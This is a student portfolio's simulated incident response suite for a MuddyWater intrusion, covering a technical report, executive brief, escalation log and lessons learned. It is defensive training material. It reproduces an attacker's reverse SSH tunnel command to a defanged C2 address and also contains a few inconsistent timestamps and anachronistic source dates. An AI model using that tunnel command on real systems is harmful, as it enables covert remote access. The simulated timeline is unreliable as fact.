Cipher&Counsel
IR Documentation Suite ← Portfolio
UTSA Capstone · 2025 IR Documentation Suite TLP:WHITE · Simulation · Shadow Sample

Incident Response
Documentation Suite

Operation Coastal Intrusion — Boggy Serpens Campaign Response · January 2026

A full-cycle incident response simulation documenting the detection, investigation, escalation, and remediation of a Boggy Serpens (MuddyWater) intrusion against a simulated energy sector organization. This suite demonstrates the ability to produce all written deliverables a security operations team generates during and after an active incident — adapting format, depth, and language for every audience from technical analysts to executive leadership.

Incident ID
INC-2026-0124
Classification
Cyberespionage · Critical
Threat Actor
Boggy Serpens · G0069
Detection Date
January 24, 2026
Status
Contained · Remediated
Shadow Sample — Full-cycle IR documentation suite produced as a UTSA capstone portfolio piece. Incident scenario is a simulation. Forensic artifacts and TTPs are sourced from publicly available Unit 42, Huntress, and MITRE ATT&CK research. No proprietary or confidential data is reproduced.
Document 01 of 04

Technical Investigation Report

This report documents the full technical investigation of Incident INC-2026-0124, a confirmed Boggy Serpens intrusion detected January 24, 2026, against a simulated energy sector organization. The investigation covers initial detection, forensic analysis, attack chain reconstruction, and containment actions taken.

Key Finding

Boggy Serpens achieved initial access via a macro-laden Word document delivered from a compromised external partner email account. The attacker established persistence using FMAPP.exe (a custom DLL loader), achieved lateral movement via SSH tunneling to C2 IP 162.0.230[.]185, and conducted active reconnaissance before detection and eviction. Dwell time: approximately 4 hours.

Incident Overview

Background and Scope

On January 24, 2026 at approximately 22:00 UTC, a Tier 1 SOC analyst escalated an alert from Cortex XDR flagging anomalous process execution on endpoint WS-ENGR-047, an engineering workstation in the organization's maritime operations division. Initial triage confirmed active attacker presence. The incident was classified Critical and Tier 2 response was activated within 14 minutes of initial detection.

Forensic analysis confirmed the intrusion was conducted by Boggy Serpens (MuddyWater / G0069), an Iranian MOIS-attributed threat actor with a documented mandate to target energy, maritime, and engineering sector organizations consistent with this organization's profile. The attack chain is consistent with TTPs documented in the Unit 42 Boggy Serpens Threat Assessment published March 2026 and the Huntress MuddyWater attack chain analysis of January 2026.

FieldValue
Incident IDINC-2026-0124
Detection Time2026-01-24T22:00:00Z
Containment Time2026-01-24T23:47:00Z
Dwell Time~4 hours (estimated initial access 18:00 UTC)
Affected EndpointWS-ENGR-047 — Engineering Workstation · Windows 11 Pro
Affected UserEngineering Department — credentials not confirmed compromised at time of report
Threat ActorBoggy Serpens · MuddyWater · G0069 · Iran MOIS — HIGH CONFIDENCE
Attack VectorSpearphishing attachment — macro-laden Word document via compromised partner account
SeverityCRITICAL — Nation-state intrusion · Active C2 · Lateral movement observed
Attack Chain Reconstruction

Forensic Timeline — January 24, 2026

The following timeline was reconstructed from Cortex XDR telemetry, Windows Event Logs, email gateway logs, and network flow data. All timestamps are UTC.

T0
~18:00 UTC — Initial Access
Spearphishing Attachment Delivered — T1566.001
A Word document titled "Engineering Status Update — Subsea Pipeline Q1 2026.docx" was delivered to the engineering department inbox from a compromised external partner email account. The document displayed blurred content and prompted the user to enable macros to view the full document — consistent with Boggy Serpens social engineering technique. The user enabled macros.
T1
~18:04 UTC — Execution
VBA Macro Execution — T1059.005 · Phoenix Lineage Builder
VBA macro executed, dropping FMAPP.exe to C:\Users\[user]\AppData\Roaming\novaservice.exe — a file path observed across the Boggy Serpens Phoenix Lineage and UDPGangster toolchains sharing an identical decryption key. FMAPP.exe loaded a malicious DLL establishing the initial implant.
T2
~18:10 UTC — Persistence
Scheduled Task Created — T1053.005
A scheduled task was created to execute FMAPP.exe on system startup, ensuring persistence across reboots. The task was registered under a name mimicking a legitimate Windows maintenance service.
T3
~18:15 – 22:00 UTC — C2 Beacon and Reconnaissance
SSH Tunneling Established — T1095 / T1572
The attacker established an SSH reverse tunnel to C2 infrastructure using Windows native OpenSSH, a living-off-the-land technique avoiding custom tooling detection:

C:\Windows\System32\OpenSSH\ssh.exe -p 22 -o StrictHostKeyChecking=no asuedulimit@162.0.230[.]185 -2 -4 -N -R 10841

The attacker ran tasklist | findstr FMAPP to verify the implant was running, then connected to ifconfig[.]me to confirm the victim machine's public IP address — standard Boggy Serpens operational security verification behavior.
T4
22:00 UTC — Detection
Cortex XDR Alert — Anomalous SSH Tunnel and ifconfig.me Connection
Cortex XDR flagged the SSH tunneling activity and the external connection to ifconfig[.]me from a workstation with no prior history of either behavior. Alert classified HIGH. Tier 1 analyst escalated to Tier 2 at 22:14 UTC.
T5
22:14 – 22:47 UTC — Containment
Endpoint Isolated · Network Blocked · Scheduled Task Removed
WS-ENGR-047 was isolated via Cortex XDR at 22:23 UTC, severing C2 connectivity. Network firewall rules blocking outbound connections to 162.0.230[.]185 applied at 22:31 UTC. Scheduled task and FMAPP.exe removed at 22:47 UTC. No evidence of lateral movement to additional hosts confirmed at time of containment.
MITRE ATT&CK Mapping

Techniques Observed — This Incident

Technique IDTacticNameEvidence
T1566.001Initial Access Phishing: Spearphishing Attachment Macro-laden Word document delivered from compromised external partner account
T1059.005Execution Visual Basic VBA macro in Word document dropping FMAPP.exe loader
T1053.005Persistence Scheduled Task / Job Startup scheduled task executing FMAPP.exe on system reboot
T1036Defense Evasion Masquerading novaservice.exe file path; scheduled task name mimicking legitimate service
T1572Command & Control Protocol Tunneling SSH reverse tunnel via native Windows OpenSSH to 162.0.230[.]185
T1016Discovery System Network Configuration Discovery Connection to ifconfig[.]me to confirm victim public IP address
T1057Discovery Process Discovery tasklist | findstr FMAPP executed to verify implant execution
MITRE ATT&CK Enterprise v18, October 2025 · attack.mitre.org · Huntress MuddyWater Attack Chain Analysis, March 2026 · Unit 42 Boggy Serpens Threat Assessment, March 2026
Forensic Artifacts

Key Indicators from This Incident

Process Execution Log — SSH Tunnel Commands (Reconstructed from Windows Event Logs)
# 2026-01-24 22:22:03 UTC — First SSH tunnel attempt
C:\Windows\System32\OpenSSH\ssh.exe -p 22 \
  -o StrictHostKeyChecking=no \
  asuedulimit@162.0.230[.]185 \
  -2 -4 -N -R 10841

# 2026-01-24 22:26:48 UTC — Second attempt after initial C2 verification failure
C:\Windows\System32\OpenSSH\ssh.exe -p 22   
-o StrictHostKeyChecking=no   
asuedulimit@162.0.230[.]185   
-2 -4 -N -R 10841

# Attacker verification commands (reconstructed from process telemetry)
tasklist | findstr FMAPP
ping 162.0.230[.]185
C:\Windows\System32\OpenSSH\ssh.exe # re-executed after ping confirmation
IndicatorTypeContext
162.0.230[.]185IP (defanged)SSH C2 server — observed in Huntress MuddyWater investigation January 2026
novaservice.exeFile Path / NameShared artifact across Phoenix Lineage and UDPGangster builder tracks
FMAPP.exeExecutableCustom DLL loader — drops malicious DLL establishing implant
asuedulimitSSH UsernameC2 tunnel username observed in Huntress analysis
ifconfig[.]meDomain (defanged)Public IP discovery — attacker operational security verification step
Forensic artifacts: Huntress — Unmasking an Attack Chain of MuddyWater, March 2026 (huntress.com/blog/muddywater-attack-chain) · Group-IB — Unmasking MuddyWater's New Malware Toolkit, October 2025
Document 02 of 04

Executive Briefing

Prepared for: Chief Executive Officer, Chief Operating Officer, General Counsel, Board Risk Committee
Classification: Internal · Confidential · TLP:WHITE (this simulation)
Date: January 25, 2026

Situation

What Happened

1
Workstation compromised — engineering division
4h
Attacker dwell time before detection and containment
0
Confirmed data exfiltrated at time of this briefing
14m
Time from detection to Tier 2 analyst engagement

On the evening of January 24, 2026, a state-sponsored Iranian hacking group known as Boggy Serpens successfully compromised one engineering workstation within this organization. The attacker gained access by sending a malicious document disguised as an internal engineering report — delivered from an email address that appeared to belong to a trusted external partner.

Our security operations team detected the intrusion approximately four hours after it began, isolated the affected computer within 23 minutes of detection, and confirmed containment within two hours. There is currently no evidence that sensitive data was copied or transmitted out of the organization. Investigation continues.

Who is Boggy Serpens?

Boggy Serpens — also known as MuddyWater — is an Iranian government hacking team that has been active since 2017, targeting energy companies, maritime operators, government ministries, and diplomatic missions across the Middle East, Europe, and the Americas. The group works in service of Iran's Ministry of Intelligence and Security. Their goal in this type of operation is intelligence collection — stealing sensitive documents, monitoring communications, and maintaining long-term hidden access to strategic organizations. Palo Alto Networks Unit 42 published a major threat assessment of this group in March 2026, citing a significant escalation in the sophistication and persistence of their campaigns.

Impact Assessment

Business and Legal Considerations

Operational Impact — Contained

The compromised workstation has been isolated from the network and is undergoing forensic imaging. Engineering operations on other systems were not affected. No systems were encrypted, destroyed, or rendered unavailable. No customer-facing services were disrupted.

Data Exposure Risk — Under Investigation

The affected workstation had access to engineering documentation related to maritime infrastructure projects. Forensic analysis is ongoing to determine precisely which files the attacker could have accessed during the four-hour dwell period. A definitive data exposure assessment will be provided within 48 hours. General Counsel has been notified and is monitoring regulatory notification obligations.

Regulatory Considerations

Depending on the outcome of the data exposure investigation, the organization may have notification obligations under applicable data protection regulations. General Counsel and the privacy team are engaged. No notifications have been issued at this time. A decision point will be reached within 72 hours pending forensic findings.

Response Actions

What We Have Done and What Comes Next

✓ Done
Compromised Workstation Isolated
WS-ENGR-047 was removed from the network at 22:23 UTC on January 24. The attacker's remote access was severed. The machine is undergoing forensic imaging.
✓ Done
Attacker Infrastructure Blocked
Network firewall rules blocking all communication to and from the attacker's known infrastructure were applied at 22:31 UTC. Threat intelligence feeds updated.
✓ Done
Malicious Software Removed
The attacker's persistence mechanism — a scheduled task executing a malicious loader — was identified and removed at 22:47 UTC. The host is being rebuilt from a clean image.
→ In Progress
Full Forensic Investigation
Forensic analysts are examining all telemetry from the four-hour dwell period to confirm the full scope of attacker activity, determine what data was accessed, and identify any additional persistence mechanisms not yet discovered.
→ Planned
Organization-Wide Threat Hunt
Using indicators from this incident, the security team will hunt across all endpoints and network traffic for evidence of additional Boggy Serpens implants or staging infrastructure within the organization's environment.
Bottom Line

The One Thing Leadership Needs to Know

A sophisticated nation-state attacker successfully compromised one workstation in our engineering division and maintained hidden access for approximately four hours. Our security team detected and contained the intrusion the same evening. There is no evidence of data loss at this time, but investigation continues. The security team is treating this as a high-priority incident and will provide daily updates until the investigation is closed.

The attacker's method — sending a malicious document from a trusted partner's compromised email account — is specifically designed to defeat standard email security controls. This was not a failure of employee behavior or negligence. It was a sophisticated technique that exploits human trust in known contacts. The appropriate response is technical: enforcing phishing-resistant authentication and deploying behavioral email analytics. Recommendations follow in the Lessons Learned document.

Document 03 of 04

Escalation Log & Communication Record

This document records all formal escalations, stakeholder notifications, and decision-point communications during Incident INC-2026-0124. Maintained as the authoritative communication audit trail for post-incident review and potential regulatory review. All timestamps are UTC.

Escalation Timeline

Chronological Escalation Record

ESC-001
2026-01-24 · 22:00 UTC
HIGH
From: Tier 1 SOC Analyst → To: Tier 1 Queue
Cortex XDR generated HIGH severity alert on endpoint WS-ENGR-047 for anomalous outbound SSH connection to external IP 162.0.230[.]185 via Windows native OpenSSH — a process not normally executed from this workstation. Secondary alert flagged connection to ifconfig[.]me from the same endpoint within the same 15-minute window. Alert assigned to Tier 1 analyst for initial triage.
Action Taken: Alert opened · Triage initiated
ESC-002
2026-01-24 · 22:14 UTC
CRITICAL
From: Tier 1 Analyst → To: Tier 2 Analyst + SOC Lead
Tier 1 triage confirmed active attacker presence. Process telemetry revealed FMAPP.exe executing from C:\Users\[user]\AppData\Roaming\novaservice.exe — a known Boggy Serpens artifact path. Attacker confirmed to have run tasklist | findstr FMAPP and ping 162.0.230[.]185, indicating active C2 session management. Incident reclassified CRITICAL. Tier 2 analyst and SOC Lead paged via PagerDuty.
Action Taken: Critical declared · Tier 2 engaged · SOC Lead notified
ESC-003
2026-01-24 · 22:23 UTC
CRITICAL
From: Tier 2 Analyst → To: Network Security Team
Tier 2 analyst authorized endpoint isolation of WS-ENGR-047 via Cortex XDR. Endpoint isolated successfully at 22:23 UTC. C2 connectivity severed. Network Security Team notified to apply firewall blocks on 162.0.230[.]185 and associated infrastructure.
Action Taken: Endpoint isolated at 22:23 UTC
ESC-004
2026-01-24 · 22:31 UTC
CRITICAL
From: SOC Lead → To: CISO
SOC Lead notified CISO of confirmed nation-state intrusion. Actor attributed with high confidence to Boggy Serpens / MuddyWater (Iran MOIS) based on novaservice.exe artifact, SSH tunneling tradecraft, and target profile. Network blocks applied. Forensic imaging of WS-ENGR-047 authorized. Data exposure scope unknown pending investigation.
Action Taken: CISO notified · Firewall blocks applied at 22:31 UTC
ESC-005
2026-01-24 · 22:47 UTC
HIGH
From: Tier 2 Analyst → To: IT Operations
Malicious scheduled task and FMAPP.exe loader confirmed identified and removed from WS-ENGR-047. Host scheduled for rebuild from clean image. IT Operations notified to prepare replacement workstation for the affected engineering user. Forensic image completed and transferred to investigation storage.
Action Taken: Persistence removed at 22:47 UTC · Containment confirmed
ESC-006
2026-01-25 · 09:00 UTC
MEDIUM
From: CISO → To: CEO · COO · General Counsel · Board Risk Committee
Executive Briefing (Document 02 of this suite) distributed to senior leadership and board risk committee. Incident declared contained. Investigation ongoing. General Counsel monitoring regulatory notification obligations. No external notifications issued at this time pending forensic findings on data exposure scope.
Action Taken: Executive Briefing distributed · Regulatory monitoring initiated
Incident Metrics

Response Time Summary

MetricTimeTarget SLAStatus
Time to Detection (from estimated initial access)~4 hoursLess than 1 hour (ideal)Exceeded Target
Time from Detection to Tier 2 Escalation14 minutes30 minutesWithin SLA
Time from Detection to Endpoint Isolation23 minutes30 minutesWithin SLA
Time from Detection to Network Blocks31 minutes30 minutesMarginally Exceeded
Time from Detection to Containment Confirmed1 hour 47 min2 hoursWithin SLA
Time from Detection to Executive Notification11 hours (next morning)4 hoursExceeded — see Lessons Learned
Document 04 of 04

Lessons Learned Publication

Distribution: All Staff · IT and Security Teams · Senior Leadership
Purpose: Organizational learning and process improvement following INC-2026-0124
Date: February 3, 2026

What Worked

Effective Response Elements

The security team performed well under pressure. These elements of the response should be preserved and strengthened.

Worked Well · 01
Cortex XDR Detection Was Accurate and Timely
The behavioral analytics platform flagged SSH tunneling and the ifconfig.me connection as anomalous without requiring a known malware signature. This detection was based on behavioral deviation from the workstation's baseline — exactly the type of detection needed against novel tooling from a sophisticated actor.
Worked Well · 02
Tier 1 to Tier 2 Escalation Was Fast
The 14-minute escalation from initial alert to Tier 2 engagement was within SLA and demonstrated good analyst judgment in correctly identifying the suspicious SSH and ifconfig.me combination as an active intrusion indicator rather than a false positive.
Worked Well · 03
Endpoint Isolation Was Executed Correctly
WS-ENGR-047 was isolated within 23 minutes of detection without disrupting other endpoints or services. The Cortex XDR isolation workflow functioned as designed, severing C2 connectivity immediately while preserving forensic evidence on the host.
Worked Well · 04
Attribution Was Rapid and Accurate
The novaservice.exe file path artifact allowed immediate attribution to Boggy Serpens based on prior threat intelligence — demonstrating the value of maintaining current, operationally useful threat actor profiles and integrating them into SOC workflows.
What to Improve

Process Gaps and Corrective Actions

Gap · 01
Detection Latency — 4-Hour Dwell Time Before Alert
The initial access event (macro execution at ~18:00 UTC) was not detected until the SSH tunneling behavior four hours later. Macro execution from Office applications spawning child processes should generate an immediate alert without requiring subsequent C2 activity as a confirming signal.

Corrective Action: Create a new detection rule: any Office application (Word, Excel) spawning PowerShell, cmd.exe, or a non-standard child process generates a HIGH alert immediately. Target: deploy within 72 hours.
Gap · 02
Executive Notification Delayed to Next Morning
The CISO notified executive leadership at 09:00 UTC the following day — 11 hours after initial detection and 7 hours after confirmed containment. The escalation SLA for nation-state intrusions requires executive notification within 4 hours.

Corrective Action: Update the Incident Response Plan to explicitly define the executive notification trigger. For any confirmed nation-state actor classification, the CISO must notify the CEO and General Counsel within 4 hours regardless of time of day. Update on-call rotation accordingly.
Gap · 03
Macro Execution Was Not Blocked by Policy
The user was able to enable macros in the malicious Word document. Group Policy should have restricted macro execution to signed macros only — or blocked it entirely for users without a documented business requirement.

Corrective Action: Implement Group Policy to block macro execution in Office applications for all users by default. Users with documented business requirements for macros must be individually approved through the IT change control process. Target: deploy within 30 days.
Gap · 04
External Partner Email Security Not Verified
The malicious email was delivered from a compromised external partner account. The organization had no visibility into the security posture of this partner's email environment and no process for verifying unexpected emails from partner domains.

Corrective Action: Implement a vendor email security review process for all high-trust external partner relationships. Evaluate deployment of email authentication controls (DMARC, DKIM, SPF enforcement) and behavioral analytics capable of flagging thematic anomalies from partner senders.
Priority Recommendations

Five Actions for the Next 30 Days

PriorityActionOwnerTimelineExpected Impact
P1 Deploy Office macro execution detection rule — alert on any Office process spawning cmd.exe, PowerShell, or non-standard child processes SOC Engineering 72 hours Reduces dwell time for macro-delivered malware from hours to minutes
P1 Block macro execution via Group Policy for all users without documented business requirements IT Operations 30 days Eliminates primary initial access vector used in this and 80%+ of Boggy Serpens campaigns
P2 Deploy phishing-resistant MFA on all email accounts — FIDO2 hardware keys for high-value accounts IT Security 60 days Prevents account takeover even if credentials are compromised — defeats Boggy Serpens' trusted-account phishing technique
P2 Update IR Plan — define 4-hour executive notification SLA for nation-state incidents; update on-call rotation CISO 14 days Closes escalation SLA gap identified in this incident; ensures leadership is informed within regulatory and governance timeframes
P3 Deploy behavioral email analytics assessing thematic anomalies beyond sender reputation IT Security 90 days Provides detection capability against internal account phishing — Boggy Serpens' most evasion-resistant technique
Closing Statement

What This Incident Means for the Organization

This incident was a deliberate, targeted attack by a well-resourced nation-state actor with a specific mandate to penetrate maritime and energy sector organizations. The attacker's choice of this organization was not random — it reflects strategic intelligence about this industry and the adversary's operational priorities.

The security team's response was effective and professional. Containment was achieved the same evening. The gaps identified in this review are process and policy gaps, not gaps in analyst competence or platform capability. Closing them systematically over the next 90 days will meaningfully reduce the risk of a similar incident resulting in successful data exfiltration.

Cybersecurity research only protects organizations when the findings reach the right audience in the right format. This suite of documents — the technical investigation, the executive brief, the escalation log, and these lessons learned — represents that principle in practice. Every stakeholder received the information they needed, in the language they could act on.

For Further Reading

The threat actor behind this incident — Boggy Serpens — is documented in detail in the companion Threat Intelligence Research Report in this portfolio, including full MITRE ATT&CK technique mapping, malware toolkit analysis, and detection guidance. The SIEM Alert Enrichment Playbook documents the enrichment workflow used during triage of INC-2026-0124.

Sources: Unit 42 Boggy Serpens Threat Assessment, March 2026 · Huntress — Unmasking an Attack Chain of MuddyWater, March 2026 · MITRE ATT&CK Enterprise v18, October 2025 · NIST SP 800-61r3 Computer Security Incident Handling Guide